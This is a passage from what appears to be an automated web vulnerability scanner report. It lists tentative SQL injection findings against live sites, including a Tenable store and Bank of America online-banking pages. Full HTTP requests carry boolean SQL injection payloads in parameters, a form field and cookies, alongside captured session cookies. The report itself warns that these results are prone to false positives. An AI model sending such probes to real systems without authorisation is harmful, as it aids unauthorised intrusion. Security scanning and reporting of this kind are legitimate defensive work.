The products_id parameter appears to be vulnerable to SQL injection attacks. The payloads 89838642%20or%201%3d1--%20 and 89838642%20or%201%3d2--%20 were each submitted in the products_id parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:47:52 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=product_info&cPath=5&products_id=989838642%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:47:52 GMT
Server: Apache
Set-Cookie: zenid=ceaa8dbe67c94b10d2c15c4816585a26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22852

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping " />
<meta name="description" content="Tenable Store - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.hoverIntent.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/jquery.cycle.all.min.js"></script>
<script type="text/javascript" src="includes/templates/tenable/jscript/t.js?v=1"></script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2024167-3']);
_gaq.push(['_setDomainName', '.tenable.com']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ?
...[SNIP]...

1.23. https://store.tenable.com/index.php [zenid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The zenid parameter appears to be vulnerable to SQL injection attacks. The payloads 50326897'%20or%201%3d1--%20 and 50326897'%20or%201%3d2--%20 were each submitted in the zenid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:52:22 GMT
Server: Apache
Content-Length: 211
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /index.php
on this server.</p>
</body></html>

Request 2

GET /index.php?main_page=shopping_cart&zenid=5717419e1ab4b29ffbd339c41541e7c750326897'%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 406 Not Acceptable
Date: Mon, 25 Apr 2011 23:52:22 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0


1.24. http://www.afreshbunch.com/ [email parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /?page=login&cmd=save_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640
Content-Length: 810

custom-field9971=asdfgh&custom-field0=asdfgh&custom-field8959=%27%27&custom-field6=sa94115%40gmail.com&custom-field9735=&custom-field1997=&custom-field5407=&custom-field5=Other&custom-field1=&custom-f
...[SNIP]...
quug3NJl59rM6BBo89xv83HWkjqSOLI2J7kinnF_51pgq4yPw&recaptcha_response_field=mut+onader&B1=Continue+Registration+--%3E&last_seen=4%2F25%2F2011+8%3A44%3A36+PM&profile_image_url=&email=sa94115%40gmail.com'&password=123456&password1=123456&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&remote_ip=173.193.214.243&username=asdfgh&from_member=&timestamp=4%2F25%2F2011+8%3A44%3A36+PM&newsletter=1&referral_i
...[SNIP]...

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1296
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:17:02 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:18:02 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
0
<script>
function checkcomment(objValue)
{

if(eva
...[SNIP]...

Request 2

POST /?page=login&cmd=save_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.3.10.1303778640
Content-Length: 810

custom-field9971=asdfgh&custom-field0=asdfgh&custom-field8959=%27%27&custom-field6=sa94115%40gmail.com&custom-field9735=&custom-field1997=&custom-field5407=&custom-field5=Other&custom-field1=&custom-f
...[SNIP]...
quug3NJl59rM6BBo89xv83HWkjqSOLI2J7kinnF_51pgq4yPw&recaptcha_response_field=mut+onader&B1=Continue+Registration+--%3E&last_seen=4%2F25%2F2011+8%3A44%3A36+PM&profile_image_url=&email=sa94115%40gmail.com''&password=123456&password1=123456&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&remote_ip=173.193.214.243&username=asdfgh&from_member=&timestamp=4%2F25%2F2011+8%3A44%3A36+PM&newsletter=1&referral_i
...[SNIP]...

Response 2

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 150
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:17:03 GMT
Location: /?page=login&cmd=approval
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:18:04 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/?page=login&amp;cmd=approval">here</a>.</body>

1.25. https://www.bankofamerica.com/Control.do [BOA_0020 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BOA_0020 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_0020 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1'%20and%201%3d1--%20; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:43:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000di3MrEAFgoFCSA05OhNJARS:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=688; Expires=Sun, 23 Oct 2011 12:43:16 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:43:16 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1'%20and%201%3d2--%20; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:43:17 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000-D1ITi8DH4KajyVwOtvwOY0:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=39605; Expires=Sun, 23 Oct 2011 12:43:17 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="t
...[SNIP]...

1.26. https://www.bankofamerica.com/Control.do [BOA_COM_BT_ELIGIBLE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BOA_COM_BT_ELIGIBLE cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the BOA_COM_BT_ELIGIBLE cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:47 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=353; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:47 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=843211; Expires=Sun, 23 Oct 2011 12:27:46 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...

1.27. https://www.bankofamerica.com/Control.do [CONTEXT cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The CONTEXT cookie appears to be vulnerable to SQL injection. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (URL-decoded: ' and 1=1--  and ' and 1=2-- ) were each appended to the cookie's normal value en_US. The scanner reports that the two requests produced different responses and takes this as a sign that the cookie value is concatenated into a SQL query.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, and the captured evidence below does not confirm this finding: both responses are 200 OK with Content-Length 8843 and the same page title, and the only visible differences are in the Set-cookie headers (ngen_throttle=6967 with hp_beta=B in Response 1 against ngen_throttle=763627 in Response 2). Headers of that kind change independently of the injected input. Manually review the requests and responses, diffing the response bodies rather than the headers and replaying an unmodified baseline request to see how much the response varies on its own, before treating this as a vulnerability.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US'%20and%201%3d1--%20; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:35 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=6967; Expires=Sun, 23 Oct 2011 12:25:34 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:25:34 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
